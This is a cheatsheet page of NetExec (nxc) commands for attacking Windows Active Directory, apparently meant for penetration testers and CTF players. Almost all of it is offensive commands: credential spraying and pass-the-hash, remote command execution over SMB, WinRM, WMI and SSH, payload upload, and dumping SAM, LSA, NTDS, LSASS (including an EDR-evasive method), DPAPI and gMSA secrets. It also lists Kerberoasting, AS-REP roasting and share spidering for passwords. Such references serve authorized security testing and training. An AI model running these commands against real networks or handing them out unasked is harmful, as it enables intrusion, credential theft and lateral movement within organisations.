← All Cheatsheets
active-directory

NetExec (CrackMapExec) — AD Lateral Movement

NetExec (nxc) — the Swiss Army knife for Windows/AD lateral movement, credential spraying, and post-exploitation.

155 views Jul 2026 lazyhackers
SMB Enumeration & Auth (16)
nxc smb 192.168.1.0/24
Discover SMB hosts on subnet
smb discovery
nxc smb 10.10.10.1 -u user -p password
Test SMB credentials
smb auth
nxc smb 10.10.10.1 -u user -H NTLMhash
SMB pass-the-hash
smb pth
nxc smb 192.168.1.0/24 -u user -p password
Spray credentials across subnet
smb spray
nxc smb 10.10.10.1 -u users.txt -p passwords.txt --continue-on-success
Credential spray with lists
smb spray
nxc smb 10.10.10.1 -u user -p password --shares
Enumerate SMB shares
smb shares enum
nxc smb 10.10.10.1 -u user -p password --sessions
List active SMB sessions
smb sessions
nxc smb 10.10.10.1 -u user -p password --users
Enumerate domain users via SMB
smb users enum
nxc smb 10.10.10.1 -u user -p password --groups
Enumerate domain groups
smb groups enum
nxc smb 10.10.10.1 -u user -p password --pass-pol
Get password policy
smb policy
nxc smb 10.10.10.1 -u user -p password --rid-brute
RID brute force to enumerate users/groups
smb rid enum
nxc smb 10.10.10.1 -u user -p password --loggedon-users
List logged-on users (hunt where admins are sitting)
enum sessions
nxc smb 10.10.10.1 -u user -p password --local-auth
Authenticate with a LOCAL account instead of domain
auth local
nxc smb 10.10.10.1 -u '' -p ''
Null-session enumeration (no creds)
enum null
nxc smb 10.10.10.1 -u user -p password --computers
List domain computer objects
enum computers
nxc smb 192.168.1.0/24 -u user -p password --gen-relay-list relay.txt
Find hosts with SMB signing OFF (relay target list)
enum relay signing
Code Execution (7)
nxc smb 10.10.10.1 -u user -p password -x "whoami"
Execute command via SMB
smb exec cmd
nxc smb 10.10.10.1 -u user -p password -X "Get-Process"
Execute PowerShell command
smb exec powershell
nxc winrm 10.10.10.1 -u user -p password -x "whoami"
Execute via WinRM (PS Remoting)
winrm exec
nxc wmi 10.10.10.1 -u user -p password -x "whoami"
Execute via WMI
wmi exec
nxc smb 10.10.10.1 -u user -p password -x "whoami" --exec-method smbexec
Choose the exec method (atexec / smbexec / wmiexec / mmcexec)
exec method
nxc smb 10.10.10.1 -u user -p password --put-file ./payload.exe 'C:\Windows\Temp\p.exe'
Upload a file to the target
exec upload
nxc smb 10.10.10.1 -u user -p password --get-file 'C:\Users\Administrator\Desktop\flag.txt' ./flag.txt
Download a file from the target
exec download
Credential Dumping (10)
nxc smb 10.10.10.1 -u user -p password --sam
Dump SAM hashes (local admin needed)
sam dump creds
nxc smb 10.10.10.1 -u user -p password --lsa
Dump LSA secrets
lsa dump creds
nxc smb 10.10.10.1 -u user -p password --ntds
DCSync — dump NTDS.dit (DA needed)
ntds dcsync dump
nxc smb 10.10.10.1 -u user -p password -M mimikatz
Run Mimikatz module
mimikatz creds
nxc smb 10.10.10.1 -u user -p password -M lsassy
LSASS dump with lsassy module
lsassy lsass dump
nxc smb 10.10.10.1 -u user -p password --dpapi
Dump & decrypt DPAPI secrets (saved creds, browser, vaults)
dpapi dump
nxc smb 10.10.10.1 -u user -p password --laps
Read LAPS local-admin passwords (where authorized)
laps
nxc smb 10.10.10.1 -u admin -p password --ntds drsuapi
DCSync-style NTDS dump over DRSUAPI
ntds dcsync
nxc smb 10.10.10.1 -u user -p password -M nanodump
Dump LSASS via nanodump (more EDR-evasive)
module lsass nanodump
nxc smb 10.10.10.1 -u user -p password -M gpp_password
Recover cPassword from SYSVOL GPP (MS14-025)
module gpp
LDAP & Other Protocols (14)
nxc ldap 10.10.10.1 -u user -p password --asreproast asrep.txt
AS-REP Roasting via LDAP
ldap asrep kerberos
nxc ldap 10.10.10.1 -u user -p password --kerberoasting kerb.txt
Kerberoasting via LDAP
ldap kerberoast kerberos
nxc ldap 10.10.10.1 -u user -p password --bloodhound -ns 10.10.10.1 -c All
Collect BloodHound data via LDAP
ldap bloodhound
nxc ldap 10.10.10.1 -u user -p password --gmsa
Dump gMSA passwords
ldap gmsa
nxc mssql 10.10.10.1 -u sa -p password -q "SELECT @@version"
MSSQL query execution
mssql sql
nxc mssql 10.10.10.1 -u sa -p password --local-auth
MSSQL with local auth
mssql local-auth
nxc ssh 10.10.10.1 -u user -p password -x "id"
SSH command execution
ssh exec
nxc rdp 192.168.1.0/24 -u user -p password
Test RDP credentials on subnet
rdp spray
nxc ldap 10.10.10.1 -u user -p password -M laps
Read LAPS passwords over LDAP
ldap laps
nxc ldap 10.10.10.1 -u user -p password --trusted-for-delegation
Find unconstrained-delegation accounts
ldap delegation
nxc ldap 10.10.10.1 -u user -p password --password-not-required
Accounts with PASSWD_NOTREQD set
ldap enum
nxc ldap 10.10.10.1 -u user -p password -M adcs
Enumerate AD CS certificate authorities
ldap adcs
nxc ldap 10.10.10.1 -u user -p password -M user-desc
Dump user descriptions (often contain passwords)
ldap userdesc
nxc winrm 192.168.1.0/24 -u user -p password
Sweep hosts for WinRM (evil-winrm) access
winrm sweep
Modules & Spidering (6)
nxc smb 10.10.10.1 -u user -p password -M spider_plus
Spider every readable share and index files (JSON output)
module spider
nxc smb 10.10.10.1 -u user -p password --spider C$ --pattern password
Spider a specific share for a keyword
spider loot
nxc smb 10.10.10.1 -u user -p password -M gpp_autologin
Find autologon credentials in Group Policy
module gpp autologin
nxc smb 10.10.10.1 -u user -p password -M enum_av
Enumerate installed AV / EDR products
module av edr
nxc ldap 10.10.10.1 -u user -p password -M maq
Read the domain MachineAccountQuota
module maq
nxc smb -L
List all available NetExec modules for a protocol
module list